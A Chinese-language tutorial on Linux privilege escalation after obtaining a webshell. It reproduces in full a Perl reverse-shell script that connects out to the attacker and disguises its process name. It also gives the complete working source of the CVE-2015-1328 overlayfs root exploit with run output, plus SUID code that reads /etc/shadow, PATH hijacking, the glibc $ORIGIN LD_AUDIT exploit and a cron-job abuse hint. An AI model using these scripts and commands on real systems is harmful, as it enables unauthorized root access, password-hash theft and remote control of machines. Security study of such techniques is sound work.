LINUX提权
LINUX提权
LINUX内核漏洞提权
简介
渗透时通常拿到的webshell的权限只是web容器的权限,在IIS就是IIS(windows)用户组权限,在apache就是apache(www-data)权限,只能执行一些普通命令,例如查看当前用户、网络信息等,想进一步进行内网渗透就需要提高权限到系统权限或是root权限。
利用
获取webshell:http://www.moontester.com/1.php
查看linux发行版本
cat /etc/issue
cat /etc/*release
查看内核版本
uname -a
Linux ubuntu-virtual-machine 3.19.0-15-generic #15-Ubuntu SMP Thu Apr 16 23:32:37 UTC 2015 x86_64 x86_64 x86_64 GNU/Linux
先利用webshell在本机执行:nc -lvvp 1234
在shell上传并执行perl-reverse-shell.pl 即可连接(chmod +x perl-reverse-shell.pl )
https://github.com/pentestmonkey/perl-reverse-shell/blob/master/perl-reverse-shell.pl
my $ip = '127.0.0.1';
my $port = 1234;
改为自己的ip和端口
#!/usr/bin/perl -w
# perl-reverse-shell - A Reverse Shell implementation in PERL
# Copyright (C) 2006 pentestmonkey@pentestmonkey.net
#
# This tool may be used for legal purposes only. Users take full responsibility
# for any actions performed using this tool. The author accepts no liability
# for damage caused by this tool. If these terms are not acceptable to you, then
# do not use this tool.
#
# In all other respects the GPL version 2 applies:
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License version 2 as
# published by the Free Software Foundation.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License along
# with this program; if not, write to the Free Software Foundation, Inc.,
# 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA.
#
# This tool may be used for legal purposes only. Users take full responsibility
# for any actions performed using this tool. If these terms are not acceptable to
# you, then do not use this tool.
#
# You are encouraged to send comments, improvements or suggestions to
# me at pentestmonkey@pentestmonkey.net
#
# Description
# -----------
# This script will make an outbound TCP connection to a hardcoded IP and port.
# The recipient will be given a shell running as the current user (apache normally).
#use strict;
use Socket;
use FileHandle;
use POSIX;
my $VERSION = "1.0";# Where to send the reverse shell. Change these.
my $ip = '127.0.0.1';
my $port = 1234;# Options
my $daemon = 1;
my $auth = 0; # 0 means authentication is disabled and any # source IP can access the reverse shell
my $authorised_client_pattern = qr(^127\\.0\\.0\\.1$);# Declarations
my $global_page = "";
my $fake_process_name = "/usr/sbin/apache";# Change the process name to be less conspicious
$0 = "[httpd]";# Authenticate based on source IP address if required
if (defined($ENV{'REMOTE_ADDR'})) {cgiprint("Browser IP address appears to be: $ENV{'REMOTE_ADDR'}");if ($auth) {unless ($ENV{'REMOTE_ADDR'} =~ $authorised_client_pattern) {cgiprint("ERROR: Your client isn't authorised to view this page");cgiexit();}}
} elsif ($auth) {cgiprint("ERROR: Authentication is enabled, but I couldn't determine your IP address. Denying access");cgiexit(0);
}# Background and dissociate from parent process if required
if ($daemon) {my $pid = fork();if ($pid) {cgiexit(0); # parent exits}setsid();chdir('/');umask(0);
}# Make TCP connection for reverse shell
socket(SOCK, PF_INET, SOCK_STREAM, getprotobyname('tcp'));
if (connect(SOCK, sockaddr_in($port,inet_aton($ip)))) {cgiprint("Sent reverse shell to $ip:$port");cgiprintpage();
} else {cgiprint("Couldn't open reverse shell to $ip:$port: $!");cgiexit();
}# Redirect STDIN, STDOUT and STDERR to the TCP connection
open(STDIN, ">&SOCK");
open(STDOUT,">&SOCK");
open(STDERR,">&SOCK");
$ENV{'HISTFILE'} = '/dev/null';
system("w;uname -a;id;pwd");
exec({"/bin/sh"} ($fake_process_name, "-i"));# Wrapper around print
sub cgiprint {my $line = shift;$line .= "<p>\\n";$global_page .= $line;
}# Wrapper around exit
sub cgiexit {cgiprintpage();exit 0; # 0 to ensure we don't give a 500 response.
}# Form HTTP response using all the messages gathered by cgiprint so far
sub cgiprintpage {print "Content-Length: " . length($global_page) . "\\r
Connection: close\\r
Content-Type: text\\/html\\r\\n\\r\\n" . $global_page;
}id查看权限:uid=33(www-data) gid=33(www-data) groups=33(www-data)
whoami查看用户:www-data
EXP:https://www.exploit-db.com/
查找3.19,找到本地提权的exp:Linux Kernel 3.13.0 < 3.19 (Ubuntu 12.04/14.04/14.10/15.04) - ‘overlayfs’ Local Privilege Escalation(https://www.exploit-db.com/exploits/37292)
/*
# Exploit Title: ofs.c - overlayfs local root in ubuntu
# Date: 2015-06-15
# Exploit Author: rebel
# Version: Ubuntu 12.04, 14.04, 14.10, 15.04 (Kernels before 2015-06-15)
# Tested on: Ubuntu 12.04, 14.04, 14.10, 15.04
# CVE : CVE-2015-1328 (http://people.canonical.com/~ubuntu-security/cve/2015/CVE-2015-1328.html)*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*
CVE-2015-1328 / ofs.c
overlayfs incorrect permission handling + FS_USERNS_MOUNTuser@ubuntu-server-1504:~$ uname -a
Linux ubuntu-server-1504 3.19.0-18-generic #18-Ubuntu SMP Tue May 19 18:31:35 UTC 2015 x86_64 x86_64 x86_64 GNU/Linux
user@ubuntu-server-1504:~$ gcc ofs.c -o ofs
user@ubuntu-server-1504:~$ id
uid=1000(user) gid=1000(user) groups=1000(user),24(cdrom),30(dip),46(plugdev)
user@ubuntu-server-1504:~$ ./ofs
spawning threads
mount #1
mount #2
child threads done
/etc/ld.so.preload created
creating shared library
# id
uid=0(root) gid=0(root) groups=0(root),24(cdrom),30(dip),46(plugdev),1000(user)greets to beist & kaliman
2015-05-24
%rebel%
*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*
*/#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <sched.h>
#include <sys/stat.h>
#include <sys/types.h>
#include <sys/mount.h>
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <sched.h>
#include <sys/stat.h>
#include <sys/types.h>
#include <sys/mount.h>
#include <sys/types.h>
#include <signal.h>
#include <fcntl.h>
#include <string.h>
#include <linux/sched.h>#define LIB "#include <unistd.h>\\n\\nuid_t(*_real_getuid) (void);\\nchar path[128];\\n\\nuid_t\\ngetuid(void)\\n{\\n_real_getuid = (uid_t(*)(void)) dlsym((void *) -1, \\"getuid\\");\\nreadlink(\\"/proc/self/exe\\", (char *) &path, 128);\\nif(geteuid() == 0 && !strcmp(path, \\"/bin/su\\")) {\\nunlink(\\"/etc/ld.so.preload\\");unlink(\\"/tmp/ofs-lib.so\\");\\nsetresuid(0, 0, 0);\\nsetresgid(0, 0, 0);\\nexecle(\\"/bin/sh\\", \\"sh\\", \\"-i\\", NULL, NULL);\\n}\\n return _real_getuid();\\n}\\n"static char child_stack[1024*1024];static int
child_exec(void *stuff)
{char *file;system("rm -rf /tmp/ns_sploit");mkdir("/tmp/ns_sploit", 0777);mkdir("/tmp/ns_sploit/work", 0777);mkdir("/tmp/ns_sploit/upper",0777);mkdir("/tmp/ns_sploit/o",0777);fprintf(stderr,"mount #1\\n");if (mount("overlay", "/tmp/ns_sploit/o", "overlayfs", MS_MGC_VAL, "lowerdir=/proc/sys/kernel,upperdir=/tmp/ns_sploit/upper") != 0) {
// workdir= and "overlay" is needed on newer kernels, also can't use /proc as lowerif (mount("overlay", "/tmp/ns_sploit/o", "overlay", MS_MGC_VAL, "lowerdir=/sys/kernel/security/apparmor,upperdir=/tmp/ns_sploit/upper,workdir=/tmp/ns_sploit/work") != 0) {fprintf(stderr, "no FS_USERNS_MOUNT for overlayfs on this kernel\\n");exit(-1);}file = ".access";chmod("/tmp/ns_sploit/work/work",0777);} else file = "ns_last_pid";chdir("/tmp/ns_sploit/o");rename(file,"ld.so.preload");chdir("/");umount("/tmp/ns_sploit/o");fprintf(stderr,"mount #2\\n");if (mount("overlay", "/tmp/ns_sploit/o", "overlayfs", MS_MGC_VAL, "lowerdir=/tmp/ns_sploit/upper,upperdir=/etc") != 0) {if (mount("overlay", "/tmp/ns_sploit/o", "overlay", MS_MGC_VAL, "lowerdir=/tmp/ns_sploit/upper,upperdir=/etc,workdir=/tmp/ns_sploit/work") != 0) {exit(-1);}chmod("/tmp/ns_sploit/work/work",0777);}chmod("/tmp/ns_sploit/o/ld.so.preload",0777);umount("/tmp/ns_sploit/o");
}int
main(int argc, char **argv)
{int status, fd, lib;pid_t wrapper, init;int clone_flags = CLONE_NEWNS | SIGCHLD;fprintf(stderr,"spawning threads\\n");if((wrapper = fork()) == 0) {if(unshare(CLONE_NEWUSER) != 0)fprintf(stderr, "failed to create new user namespace\\n");if((init = fork()) == 0) {pid_t pid =clone(child_exec, child_stack + (1024*1024), clone_flags, NULL);if(pid < 0) {fprintf(stderr, "failed to create new mount namespace\\n");exit(-1);}waitpid(pid, &status, 0);}waitpid(init, &status, 0);return 0;}usleep(300000);wait(NULL);fprintf(stderr,"child threads done\\n");fd = open("/etc/ld.so.preload",O_WRONLY);if(fd == -1) {fprintf(stderr,"exploit failed\\n");exit(-1);}fprintf(stderr,"/etc/ld.so.preload created\\n");fprintf(stderr,"creating shared library\\n");lib = open("/tmp/ofs-lib.c",O_CREAT|O_WRONLY,0777);write(lib,LIB,strlen(LIB));close(lib);lib = system("gcc -fPIC -shared -o /tmp/ofs-lib.so /tmp/ofs-lib.c -ldl -w");if(lib != 0) {fprintf(stderr,"couldn't create dynamic library\\n");exit(-1);}write(fd,"/tmp/ofs-lib.so\\n",16);close(fd);system("rm -rf /tmp/ns_sploit /tmp/ofs-lib.c");execl("/bin/su","su",NULL);
}
增加运行权限:chmod +x ofs
运行:./ofs
$ ./ofs
spawning threads
mount #1
mount #2
child threads done
/etc/ld.so.preload created
creating shared library
sh: 0: can't access tty; job control turned off
# id
uid=0(root) gid=0(root) groups=0(root),33(www-data)
切换Shell
python3 -c 'import pty; pty.spawn("/bin/bash")'
python3 -c "__import__('subprocess').call(['/bin/bash'])"
LINUX SUID提权
简介
SUID是一种特殊的文件属性,它允许用户执行的文件以该文件的拥有者的身份运行。
SUID是一对种二进制程序进行设置的特殊权限,可以让二进制程序的执行者临时拥有属于程序属主的权限(仅对拥有执行权限的二进制文件有效。例如:所有用户都可以使用passwd命令来工更改自己的密码,而密码保存在/etc/shadow中,普通用户是没有读写权限的,但只有root用户拥有读写权限,但在使用passwd命令时,加上SUID特殊权限位,就可以让普通用户临时获取读写该文件的权限。(个人理解和sudo一个道理)
利用
C源码
#include<stdlib.h>
#include<unistd.h>
int main(){setuid(0);//run as rootsystem("id");system("cat /etc/shadow");return 0;
}
root用户下编译和权限设置
gcc suid.c -o suid-exp
chmod 4775 suid-exp
这样在普通用户下执行suid-exp也可以执行成功,读取到/exc/shadow文件的内容
find / -perm -u=s -type f 2>/dev/null此命令可以查询所有带suid属性的文件
劫持环境变量提权
创建一个文件并赋予权限,cat回生成shell
echo "/bin/bash">cat && chmod 777 cat
查看当前环境变量
echo $PATH
将当前目录使用普通用户临时加入环境变量
export PATH=.:$PATH
此时以普通用户权限运行suid-exp,执行到system("cat /etc/shadow");因为cat优先使用环境变量中的cat,也就是当前目录的cat,劫持到了root权限
原理: system函数继承环境变量,所以此时替换环境变量可以达到提权的目的
GNU C Library动态链接区 $ORIGIN 溢出漏洞提权
利用tmp目录权限,suid权限和C语言使普通用户提权为root
适用于 RHEL5-RHEL6 CENTOS5-CNETOS6
利用方法
环境是Centos5
创建目录
mkdir /tmp/exploit创建target文件硬链接
ln /bin/ping /tmp/exploit/target把target文件加载到内存中
exec 3< /tmp/exploit/target查看target在内存中的情况
ls -l /proc/$$/fd/3删除目录
rm -rf /tmp/exploit/
ls -l /proc/$$/fd/3新建并写入C代码
cat > payload.c
void __attribute__((constructor)) init()
{setuid(0);system("/bin/bash");
}编译
gcc -w -fPIC -shared -o /tmp/exploit payload.c
ls -l /tmp/exploit提升权限
LD_AUDIT="\\$ORIGIN" exec /proc/self/fd/3
Linux Cron Jobs提权
Cronin Jobs计划任务通过/etc/crontab文件,可以设定系统定期执行的任务
利用
crontab文件只有root用户有读写权限,在得到一个非root权限的远程登录用户的时候,可以查看/etc/crontab文件内容
# /etc/crontab: system-wide crontab
# Unlike any other crontab you don't have to run the `crontab'
# command to install the new version when you edit this file
# and files in /etc/cron.d. These files also have username fields,
# that none of the other crontabs do.SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin# m h dom mon dow user command
*/2 * * * * root /tmp/cleanup.py
17 * * * * root cd / && run-parts --report /etc/cron.hourly
25 6 * * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
47 6 * * 7 root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly )
52 6 1 * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly )
#
python脚本用来删除/home/ubuntu/cleanup/目录下的所有内容
#!/usr/bin/env python
import os
import sys
try:os.system('rm -rf /home/ubuntu/cleanup/*')# os.system('chmod u+s /bin/dash')
except:sys.exit()
关键是要有这么个计划任务才行